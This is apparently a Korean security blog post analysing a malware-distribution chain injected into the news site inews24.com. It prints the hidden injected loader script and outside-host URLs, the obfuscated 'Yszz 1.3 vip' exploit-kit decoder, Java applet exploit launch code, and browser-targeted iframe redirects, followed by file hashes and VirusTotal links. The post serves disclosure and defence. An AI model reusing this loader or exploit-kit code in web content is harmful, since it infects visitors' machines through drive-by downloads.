본문 바로가기

security/악성코드 유포

이제는 지친다! inews24.com 악성코드 유포지 총 정리!!

이제는 지친다!!! inews24.com 에서 유포중이다!

주말마다 관리자는 무엇을 하고있을까??



내부 소스에는 이와같이 스페이스와 탭으로 이루어진! 스크립트가 삽입!


document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));


--------------------------------------------------------------------------------------------


<script src=http://205.164.5.190/pic/img.js>

 ~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
 ~>http://205.164.5.190/pic/css.html (입!)

    ~> http://count24.51yes.com/click.aspx?id=249419322&logo=1


(Yszz 1.3 vip)


var MDIxo="%78"+"%6F";
var OIai8="%78"+"%6F"+"%31";
생략
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="aQCLHa58Cy3fSGI3MeP1sEO

KRLywbDXIIzBxULkgBn/D0nB/kT9MVqK/29rPw+7wspSSX4qYH3H4TMrS3lDaseKuZ+5ydruhSG6XAlVl81Fqy/9y5cz3aprjhQx6MLTaMoj9q650TsrPzkXNwh+Z77NWOlZvxX7bOFMlKO7BdlwwlwnujykUFSoyNi8snQ+N90mn7nOnAIzNndUPtUkLV/+B1YT9M1u+RRtR7fwCuD1F07IFFzf1aSbcqtdf2NMKG6xhSPeynlrxqj3uDGf41xlplDX8xIv0fepd4XsS+jZP0D0iy/B5RfpVqyMzuBPycllafgA9zCmrLhtJ0OmdlfXsc22xMemu1U6BxUyQMGxAokvOwqpdb+W9Sk2QCmcqsMewdHbk/Jfbqbee2cW9YtHv29tJaQo8WB7+7fZvONnukFDbr3ifuZTi6aT3gB4mHIazWfWZzKBTqhU2Nq

SqIM8cUmhw6TD+Wu/rlVT5SWujvvnaX9xYRSaNmOfrcrdRlS8838eJuA9RF

생략

+5f/QUEljDMY7HL0QPa0a087YViC/IbXMKTHlhaKoQM+IOuE5Gwz3GjltVa+yIvONfdD+c2uDwP4Q=",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
var B83pNx = "%53"+"%74"+"%72"+"%69"+"%6e"+"%67";
var WjuQFO = "%66"+"%72"+"%6f"+"%6d"+"%43"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65";
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,생략
7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4

7,48,49,50,51,-1,-1,-1,-1,-1);
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 1.3 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
sac5pxhFS=AVgHbu2f(sac5pxhFS);
JS0W=Cn6T4bG0znIi;
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
window[HUx2Ydz][sac5pxhFS] (JS0W);


-----------------------------------------------------------------------------------------------





중요한 부분!


kaixin.archive="K03rSYoG.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://209.73.158.76/css/img.css");
document.body.appendChild(kaixin);

OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93


document.write("<br>");
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
kaixiny.archive = "tRMfS.jpg";
kaixiny.code = "cve2012xxxx.Gondvv.class";
kaixiny.setAttribute("xiaomaolv", "http://209.73.158.76/css/img.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);


else {

var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{

  document.writeln("<iframe src=LihTNR.html( Yszz 1.3 vip )><\/iframe>");

}

else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{

  document.writeln("<iframe src=mO4b9.html( Yszz 1.3 vip )><\/iframe>");

}


연결지 정리 !


* 접속이 되어서 감염시 본인의 책임이라는 것을 알려 드립니다!


http://205.164.5.190/pic/img.js
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

        ~>  http://209.73.158.76/css/img.css (최종파일)

        ~>  tRMfS.jpg,  cve2012xxxx.Gondvv.class, mO4b9.html, LihTNR.html
    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
    ~>http://count24.51yes.com/click.aspx?id=249419322&logo=1


MD5 및 바이러스 토탈 결과 !


fd095a3357e85b4f4e5c27a9269ca021 css.html

https://www.virustotal.com/file/71254e55af538c134152bcbdd73a5c105990deb95fe5f83f34f1c27ad1db3518/analysis/1348234483/


bf1ca09bb8d9198d852a6b1ba68a355d Gondvv.class

https://www.virustotal.com/file/d15d49f0d7b4eb87ec89e7ac94bbc760e3e3000f89f46500d11ff5955f3ada17/analysis/1348234486/


acb18b560c15f972dbfbe7df5b5a8ae7 Gondzz.class

https://www.virustotal.com/file/9d44689791cb1d0c43be5fbbf6db660b826c5ac489a07a18d000780d0778fcb9/analysis/1348234489/


140c02cb07a6bf56a7b4a22020f03716 img.css

https://www.virustotal.com/file/de413e18f48bc2b461a2a7b2ae5680c104a89b71246ebcf734dc280fe6a218de/analysis/1348234508/


3c15a098eac02881b93014685a766674 img.html

https://www.virustotal.com/file/5a58dc316120d348d32e890146bfdd591d79e114e2dec6ef2f568fe923c89d93/analysis/1348234694/


6987108c7f85c4b6f097598433a3819f img.js

https://www.virustotal.com/file/06e0202eafcbc5aaf07f53be2c1e5004d84c61d62e17841d6252b4b5dbd13808/analysis/1348234699/


97c9b5b98c75bc4d20ccd6f8e28b0a7b jpg.js

https://www.virustotal.com/file/58c7d8245f33850b15212768e29489b6eded7ddbbfcda08e0d7d335c29df7a93/analysis/1348234724/


6c6799dd660ceda52cf31a46a34e3e3c LihTNR.html

https://www.virustotal.com/file/73206be591fd7db6b3342c7b091edc8f10865760e9d186870d64463c89f90484/analysis/1348234705/


5a38c126e782bc11206c7237967ad8f3 mO4b9.html

https://www.virustotal.com/file/db7c60c8f23ea1f7f0ec20726420d9eae9d2de4957704cdd23323dbd0930d243/analysis/1348234818/


de89a5739a7e333071160a552aa32b63 swfobject.js

https://www.virustotal.com/file/29ee593945dd3785157a2808e007505fb36113e3f025b4a581b0e8d333393caf/analysis/1348234827/


8990ccdbed763ef8aa3943b085313f88 tRMfS.zip

https://www.virustotal.com/file/12d81179803bd331f37383b3a2f6625af12c9fc4c2dde8d4a5dfac9df20e7a89/analysis/1348234883/


샘플 필요시 댓글 주세요!    아이뉴스 샘플.zip * 암호 설정중!


지난 아이뉴스 유포 글!


2012/09/01 - [security/악성코드 유포] - http://www.inews24.com 악성코드 유포중 !

2012/06/30 - [security/악성코드 유포] - 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !

2012/06/29 - [security/악성코드 유포] - inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !